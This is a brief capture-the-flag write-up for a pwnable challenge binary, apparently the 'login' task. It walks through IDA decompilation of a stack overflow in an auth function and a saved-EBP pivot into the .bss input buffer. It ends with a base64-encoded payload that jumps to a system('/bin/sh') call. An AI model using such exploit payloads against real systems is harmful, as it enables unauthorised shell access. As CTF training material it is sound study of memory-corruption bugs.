(Too lazy to review lessons before exam... Load with IDA and found:
_BOOL4 __cdecl auth(int a1)
{
char v2; // [sp+14h] [bp-14h]@1
char *s2; // [sp+1Ch] [bp-Ch]@1
int v4; // [sp+20h] [bp-8h]@1
memcpy(&v4, &input, a1);
s2 = (char *)calc_md5(&v2, 12);
printf("hash : %s\n", (char)s2);
return strcmp("f87cd601aa7fedca99018a8be88eda34", s2) == 0;
}
We can notice that int v4
is at bp-8h
.
str_len = Base64Decode(&s_input, &buf);
if ( str_len > 12 )
{
puts("Wrong Length");
}
else
{
memcpy(&input, buf, str_len);
if ( auth(str_len) == 1 )
correct();
}
But in main
, it's length can be up to 12.
To control EIP, we can overflow the buffer and replace EBP to change the stack, when it leaves, it will mov esp,ebp;pop ebp;
; and then it return
, it will jump to [esp].
Jump here we can get a shell:
.text:08049284 mov dword ptr [esp], offset aBinSh ; "/bin/sh"
.text:0804928B call system
And since $input
is in .bss
section and the program has no PIE
, we can simply change the stack to $input
.
.bss:0811EB40 input
The final exp:
>>> print "ABCD\x84\x92\x04\x08\x40\xeb\x11\x08".encode('base64')
QUJDRISSBAhA6xEI